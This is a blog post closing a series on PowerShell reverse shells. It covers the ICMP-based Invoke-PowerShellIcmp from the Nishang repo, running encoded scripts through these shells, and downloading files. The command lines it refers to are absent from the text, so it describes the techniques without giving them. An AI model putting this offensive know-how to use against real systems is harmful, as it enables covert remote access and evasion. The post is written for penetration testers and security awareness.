The current source code without help and credtis documentation:
Invoke-PowerShellIcmp is available in the Nishang repo here:https://github.com/samratashok/nishang/tree/master/Shells
Use below command to disable ping replies (IPv4) and start a listener:
Use below command on the target:
Awesome! An interactive PowerShell session over ICMP.
Wireshark looks like this:
A video showing DNS shell and Invoke-PowerShellIcmp in action:
Those who wanted to know what to do after we get access to a target using these shells, please refer to my earlier blogposts.
For any of the Shells discussed in these five days, a PowerShell script could be executed with the help of the -EncodedCommand or -e parameter of powershell.exe.
For example, to execute Get-WLANKeys, encode it with the help of Invoke-Encode from Nishang. Make sure to remove the function declaration and help section.
which looks like this:
Then use the encodedscript in encodedcommand.txt with any of the shells:
or you can use the below one line to execute scripts from a local web server:
Please note that I encountered error in some of the shells if the encoded script is too long. I need more testing on this problem, so please provide feedback and report bugs.
The best way to pass parameters to modules or scripts when using -EncodedCommand is to include the parameter passing within the script.
To transfer files, the best way is to use following one line downloader. You can use a local web server like Apache/HFS.
Wrap up of the Week of PowerShell Shells
We have reached the end of Week of PowerShell shells. It was a wonderful yet tiresome experience. I learned a lot while writing these posts and hope you learned something as well. The goal was to keep the posts concise and usable without going into too much details. In fact, to achive this goal, no protocol level details were discussed. I would like to believe that through this series, I am able to spread awareness about the capabilities of PowerShell to more folks in the Infosec community.
Continuing with the shameless self promotion :), I would ask you to consider joining one of my upcoming two days training “PowerShell for Penetration Testers” at:
Shakacon, Honolulu (July 6-7th) – http://shakacon.org/
I hope you enjoyed reading the posts as much as I enjoyed writing them. Please leave comments, feedback and report bugs.